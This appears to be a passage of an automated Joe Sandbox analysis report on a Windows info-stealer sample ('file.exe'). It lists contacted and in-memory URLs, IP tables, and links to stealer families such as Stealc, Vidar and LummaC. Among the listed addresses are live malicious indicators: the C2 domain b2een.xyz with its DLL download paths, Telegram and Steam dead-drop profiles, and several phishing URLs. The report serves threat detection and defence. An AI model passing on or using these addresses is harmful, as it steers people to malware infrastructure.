https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.7e27cca6027b8d6697cb.js	false		high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732530856086&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://assets.msn.com/statics/icons/favicon_newtabpage.png	false		high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732530856942&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732530850445&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://steamcommunity.com/profiles/76561199802540894	false		high
https://clients2.googleusercontent.com/crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.4a2a9ed8240d3004231b.js	false		high
https://b2een.xyz/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
https://b2een.xyz/nss3.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2626944961.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2578181796.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3132012016.00000000035FB000.00000004.00000020.00020000.00000000.sdmp, GIJECG.0.dr, DHJKJK.0.dr, Web Data.10.dr	false		high
https://c.msn.com/	2cc80dabc69f58b6_1.10.dr	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2626944961.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2578181796.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3132012016.00000000035FB000.00000004.00000020.00020000.00000000.sdmp, GIJECG.0.dr, DHJKJK.0.dr, Web Data.10.dr	false		high
http://www.broofa.com	chromecache_450.6.dr	false		high
https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://ntp.msn.com/0	000003.log5.10.dr	false		high
https://ntp.msn.com/_default	QuotaManager.10.dr	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.00000000034C6000.00000004.00000020.00020000.00000000.sdmp, JJECAA.0.dr	false		high
https://www.last.fm/	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://b2een.xyz/sqlo.dllb	file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://deff.nelreports.net/api/report?cat=msn	Reporting and NEL.11.dr	false		high
https://ntp.msn.cn/edge/ntp	2cc80dabc69f58b6_1.10.dr	false		high
https://sb.scorecardresearch.com/	2cc80dabc69f58b6_1.10.dr	false		high
https://b2een.xyz/softokn3.dll9	file.exe, 00000000.00000002.3130563158.0000000003425000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://docs.google.com/	manifest.json0.10.dr	false		high
https://www.youtube.com	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://www.instagram.com	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://web.skype.com/?browsername=edge_canary_shoreline	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://drive.google.com/	manifest.json0.10.dr	false		high
https://t.me/fu4chmor08etMozilla/5.0	file.exe	false		high
https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://www.messenger.com	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://outlook.office.com/mail/compose?isExtension=true	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://unitedstates4.ss.wd.microsoft.us/	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr	false		high
https://i.y.qq.com/n2/m/index.html	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://www.deezer.com/	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://web.telegram.org/	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3157843167.000000006F8DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.0.dr	false		high
https://b2een.xyzIECBKEGH	file.exe, 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://mozilla.org0/	file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false		high
https://drive-daily-2.corp.google.com/	manifest.json0.10.dr	false		high
https://drive-daily-4.corp.google.com/	manifest.json0.10.dr	false		high
https://vibe.naver.com/today	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://srtb.msn.com/	2cc80dabc69f58b6_1.10.dr	false		high
https://unitedstates1.ss.wd.microsoft.us/	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2626944961.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2578181796.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3132012016.00000000035FB000.00000004.00000020.00020000.00000000.sdmp, GIJECG.0.dr, DHJKJK.0.dr, Web Data.10.dr	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2626944961.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2578181796.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, DHJKJK.0.dr	false		high
https://drive-daily-1.corp.google.com/	manifest.json0.10.dr	false		high
https://excel.new?from=EdgeM365Shoreline	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	HCBGDG.0.dr	false		high
https://drive-daily-5.corp.google.com/	manifest.json0.10.dr	false		high
https://play.google.com/log?format=json&hasfast=true	chromecache_450.6.dr	false		high
https://bzib.nelreports.net/api/report?cat=bingbusiness	Reporting and NEL.11.dr	false		high
https://t.me/fu4chmoc	file.exe, 00000000.00000003.2268565103.000000000342A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/chrome	content.js.10.dr, content_new.js.10.dr	false		high
https://www.tiktok.com/	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://b2een.xyz/M	file.exe, 00000000.00000002.3130563158.0000000003425000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/web-notification-icon-light.png	2cc80dabc69f58b6_1.10.dr	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	HCBGDG.0.dr	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.00000000034C6000.00000004.00000020.00020000.00000000.sdmp, JJECAA.0.dr	false		high
https://chromewebstore.google.com/	manifest.json.10.dr	false		high
https://drive-preprod.corp.google.com/	manifest.json0.10.dr	false		high
https://srtb.msn.cn/	2cc80dabc69f58b6_1.10.dr	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3130563158.00000000034C6000.00000004.00000020.00020000.00000000.sdmp, JJECAA.0.dr	false		high
https://msn.comXIDv10	Cookies.11.dr	false		high
https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://chrome.google.com/webstore/	manifest.json.10.dr	false		high
https://y.music.163.com/m/	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://b2een.xyz/msvcp140.dll2	file.exe, 00000000.00000002.3130563158.0000000003425000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://unitedstates2.ss.wd.microsoft.us/	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr	false		high
https://bard.google.com/	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://assets.msn.cn/resolver/	2cc80dabc69f58b6_1.10.dr	false		high
https://b2een.xyz/nss3.dll2	file.exe, 00000000.00000002.3130563158.000000000346A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://browser.events.data.msn.com/	2cc80dabc69f58b6_1.10.dr	false		high
https://t.me/	file.exe, 00000000.00000002.3130563158.00000000033AE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://web.whatsapp.com	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://web.telegram.org	file.exe, 00000000.00000003.2268446600.000000000342A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://m.kugou.com/	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://www.office.com	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://outlook.live.com/mail/0/	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	JJECAA.0.dr	false		high
https://ntp.msn.com/edge/ntp	000003.log5.10.dr, 2cc80dabc69f58b6_1.10.dr	false		high
https://assets.msn.com/resolver/	2cc80dabc69f58b6_1.10.dr	false		high
https://steamcommunity.com/profiles/76561199802540894r08etMozilla/5.0	file.exe	false		high
https://powerpoint.new?from=EdgeM365Shoreline	f01e2021-85af-4286-a877-c1bb115acee0.tmp.10.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2626944961.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2578181796.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3132012016.00000000035FB000.00000004.00000020.00020000.00000000.sdmp, GIJECG.0.dr, DHJKJK.0.dr, Web Data.10.dr	false		high
https://b2een.xyztosh;	file.exe, 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.246.63	s-part-0035.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.246.40	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.96.180.189	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.200.0.6	unknown	United States	20940	AKAMAI-ASN1EU	false
20.50.201.195	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.219.82.75	unknown	United States	20940	AKAMAI-ASN1EU	false
172.217.19.225	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
108.139.47.50	unknown	United States	16509	AMAZON-02US	false
162.159.61.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
142.250.181.68	www.google.com	United States	15169	GOOGLEUS	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.64.41.3	unknown	United States	13335	CLOUDFLARENETUS	false
204.79.197.237	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.209.72.7	unknown	United States	20940	AKAMAI-ASN1EU	false
94.245.104.56	ssl.bingadsedgeextension-prod-europe.azurewebsites.net	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.183.192.109	unknown	United States	7018	ATT-INTERNET4US	false
23.44.201.8	unknown	United States	20940	AKAMAI-ASN1EU	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
23.44.201.4	unknown	United States	20940	AKAMAI-ASN1EU	false
104.117.182.56	unknown	United States	20940	AKAMAI-ASN1EU	false
23.44.201.35	unknown	United States	20940	AKAMAI-ASN1EU	false
49.13.32.95	b2een.xyz	Germany	24940	HETZNER-ASDE	true

Private

IP
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562232
Start date and time:	2024-11-25 11:32:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@68/282@18/26
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 91 Number of non-executed functions: 227
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 172.217.21.35, 172.217.19.238, 74.125.205.84, 34.104.35.123, 142.250.181.10, 172.217.17.42, 172.217.19.10, 142.250.181.138, 142.250.181.106, 172.217.19.170, 172.217.17.74, 172.217.19.202, 216.58.208.234, 172.217.19.234, 142.250.181.74, 172.217.21.42, 204.79.197.203, 204.79.197.239, 13.107.21.239, 13.107.6.158, 13.107.42.16, 13.87.96.169, 2.16.158.58, 2.16.158.59, 2.16.158.32, 2.16.158.50, 2.16.158.49, 2.16.158.40, 2.16.158.35, 2.16.158.34, 2.16.158.33, 23.48.23.152, 23.48.23.151, 172.165.69.228, 2.16.158.192, 2.16.158.43, 2.16.158.27, 2.16.158.48, 142.251.32.99, 142.251.41.3, 142.250.65.163
Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, config.edge.skype.com.trafficmanager.net, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, prod-agic-us-2.uksouth.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, msedge.b.tlu.dl.delivery.mp.microsoft.com, www.gstatic.com, l-0007.l-msedge.net, config.edge.skype.com, optimizationguide-pa.googleapis.com, www.bing.com, edge-microsoft-com.dual-a-0036.a-msedge.net, fs.microsoft.com, accounts.google.com, bingadsedgeextension-prod.trafficmanager.net, prod-agic-us-1.uksouth.cloudapp.azure.com, bzib.nelreports.net.akamaized.net, otelrules.azureedge.net, api.edgeoffer.microsoft.com, a-0003.a-msedge.net, ctldl.windowsupdate.com, ogads-pa.googleapis.com, www-msn-com.a-0003.a-msedge.net, b-0005.b-msedge.net, prod-atm-wds
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
05:33:31	API Interceptor	1x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.107.246.63	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	P0-4856383648383364838364836483.xls	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
13.107.246.40	Payment Transfer Receipt.shtml	Get hash	malicious	HTMLPhisher	Browse	www.aib.gov.uk/
	NEW ORDER.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zs
	PO_OCF 408.xls	Get hash	malicious	Unknown	Browse	2s.gg/42Q
	06836722_218 Aluplast.docx.doc	Get hash	malicious	Unknown	Browse	2s.gg/3zk
	Quotation.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zM
23.96.180.189	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	E89hSGjVrv.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	file.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	21Installer.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	https://sendbot.me/seuemprestimogarantido	Get hash	malicious	Unknown	Browse	104.26.12.222
	https://sendbot.me/seuemprestimogarantido	Get hash	malicious	Unknown	Browse	104.26.12.222
	S0FTWARE.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://account.metasystemchat.com/	Get hash	malicious	Unknown	Browse	188.114.97.3
	eddzD2MA12.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	https://usapress.info/inside-the-last-words-of-dan-haggerty-aka-grizzly-adams-and-why-he-had-to-pull-the-plug-on-his-wife-of-20-years/	Get hash	malicious	Unknown	Browse	46.105.201.240
chrome.cloudflare-dns.com	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
plus.l.google.com	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	142.250.181.110
	http://google.com	Get hash	malicious	Unknown	Browse	172.217.17.46
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.217.17.46
	https://sites.google.com/mdisrupt.com/rfp/home	Get hash	malicious	HTMLPhisher	Browse	172.217.17.78
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.217.17.78
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.217.17.78
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	142.250.181.110
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.217.17.78
	file.exe	Get hash	malicious	Cryptbot	Browse	172.217.17.78
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.217.17.78

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	lcc333.exe	Get hash	malicious	Unknown	Browse	20.2.154.66
	lcc333.exe	Get hash	malicious	Unknown	Browse	20.2.154.66
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	204.79.197.203
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	docx008.docx.doc	Get hash	malicious	Unknown	Browse	52.113.195.132
	docx002.docx.doc	Get hash	malicious	Unknown	Browse	52.113.195.132
	docx009.docx.doc	Get hash	malicious	Unknown	Browse	52.113.195.132
	docx007.docx.doc	Get hash	malicious	Unknown	Browse	52.113.195.132
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	23.101.168.44
MICROSOFT-CORP-MSN-AS-BLOCKUS	lcc333.exe	Get hash	malicious	Unknown	Browse	20.2.154.66
	lcc333.exe	Get hash	malicious	Unknown	Browse	20.2.154.66
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	204.79.197.203
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	docx008.docx.doc	Get hash	malicious	Unknown	Browse	52.113.195.132
	docx002.docx.doc	Get hash	malicious	Unknown	Browse	52.113.195.132
	docx009.docx.doc	Get hash	malicious	Unknown	Browse	52.113.195.132
	docx007.docx.doc	Get hash	malicious	Unknown	Browse	52.113.195.132
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	23.101.168.44
MICROSOFT-CORP-MSN-AS-BLOCKUS	lcc333.exe	Get hash	malicious	Unknown	Browse	20.2.154.66
	lcc333.exe	Get hash	malicious	Unknown	Browse	20.2.154.66
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	204.79.197.203
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	docx008.docx.doc	Get hash	malicious	Unknown	Browse	52.113.195.132
	docx002.docx.doc	Get hash	malicious	Unknown	Browse	52.113.195.132
	docx009.docx.doc	Get hash	malicious	Unknown	Browse	52.113.195.132
	docx007.docx.doc	Get hash	malicious	Unknown	Browse	52.113.195.132
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	23.101.168.44

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.1.237.91
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.1.237.91
	lw2HMxuVuf.exe	Get hash	malicious	Unknown	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.1.237.91
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.1.237.91
28a2c9bd18a11de089ef85a160da29e4	http://taerendil.free.fr/Kzf20FukxrNV0r0Xw3	Get hash	malicious	Unknown	Browse	20.109.210.53 13.107.246.63 20.190.147.1 23.218.208.109
	file.exe	Get hash	malicious	LummaC Stealer	Browse	20.109.210.53 13.107.246.63 20.190.147.1 23.218.208.109
	https://cgpsco.rahalat.net/conta	Get hash	malicious	Unknown	Browse	20.109.210.53 13.107.246.63 20.190.147.1 23.218.208.109
	https://google.lt/amp/taerendil.online.fr/gpfv9cqYcuejGaVElbEvNcI6wCkeo	Get hash	malicious	Unknown	Browse	20.109.210.53 13.107.246.63 20.190.147.1 23.218.208.109
	https://guardiannostrils.com/xr93bi2nq?vzvlrfl=87&refer=https%3A%2F%2Fwww.capoplayer.net%2Fplay%2Fpremier2.php&kw=%5B%5D&key=2ba8e0b8ae36a3a2c24c170c7c0734cc&scrWidth=1920&scrHeight=1080&tz=0&v=24.10.2259&ship=&psid=https://www.pelotalibretv.pl&sub3=invoke_layer&res=14.31&dev=r&adb=n&adb=n	Get hash	malicious	Anonymous Proxy	Browse	20.109.210.53 13.107.246.63 20.190.147.1 23.218.208.109
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	20.109.210.53 13.107.246.63 20.190.147.1 23.218.208.109
	file.exe	Get hash	malicious	LummaC Stealer	Browse	20.109.210.53 13.107.246.63 20.190.147.1 23.218.208.109
	05.Unzipped.obfhotel22-11.js	Get hash	malicious	RHADAMANTHYS	Browse	20.109.210.53 13.107.246.63 20.190.147.1 23.218.208.109
